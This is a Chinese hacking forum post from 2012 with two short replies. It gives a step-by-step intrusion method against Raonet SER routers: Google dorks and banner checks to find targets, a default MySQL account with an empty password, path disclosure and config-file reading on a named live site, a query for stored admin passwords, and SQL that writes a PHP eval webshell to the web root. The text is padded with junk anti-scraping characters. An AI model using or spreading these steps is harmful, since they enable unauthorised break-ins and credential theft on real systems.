找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3066|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
7 m8 f3 {) n2 i6 Y, w& S
/ E& q, |5 R$ A) r' b: _- \1:google搜索'Raonet Subscriber Ethernet Router'0 H7 L/ b- @' ]
" O. s% z3 S) `6 K
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
1 @. m: v- x0 j; g+ B
- d; S/ C4 P; H3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
: K4 s0 ]4 i6 ]# M' E) r3 y" X4 B) w
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......" e' W' S2 F+ I6 H

2 _; |, u$ z" C
& K  b* J1 y/ P! M( s/ B% L; T0 p, i7 T; M# K
入侵步骤:( z% H: w' i( y7 s

( c& ]6 i  H: [# d7 t0 M5 F0 S: r+ a2 B) t1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 {% T6 M: s0 d) W" a
, h, n1 D9 V) Y, S2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
( \4 h$ H& X- w% X! _3:得到密码后连接,查看GUI管理密码:
' z( b: J, H+ A/ J9 H6 @# F! x' Buse ser_500% p: G! I# g' C
select id,passwd from user;0 o$ U8 |6 {1 H/ Q
4:通过数据库写入webshell,执行命令:
$ C# A" ^) r/ E: luse mysql;2 x$ N& r. i6 P8 o1 b
create table ok(cmd TEXT);
  u3 c$ R8 [5 D& pinsert into ok values("<?php @eval($_POST[cmd])?>");- p, L. y% Z; D3 R
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
0 v0 }" N9 b: B1 Ydrop table ok;
9 v5 p% U3 |1 Y6 i% J+ o) m- D. ]  R8 y! f) |- S
5:连接后门shell.php
$ C. F) ^3 W3 ^4 ~& _9 k4 @9 z' K
4 e* R! _# }' w6 s" V6. 搞定!) N9 d" q" r/ F$ v  K/ U. @/ K
) Y) k" k0 g* \( d1 x/ Z
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表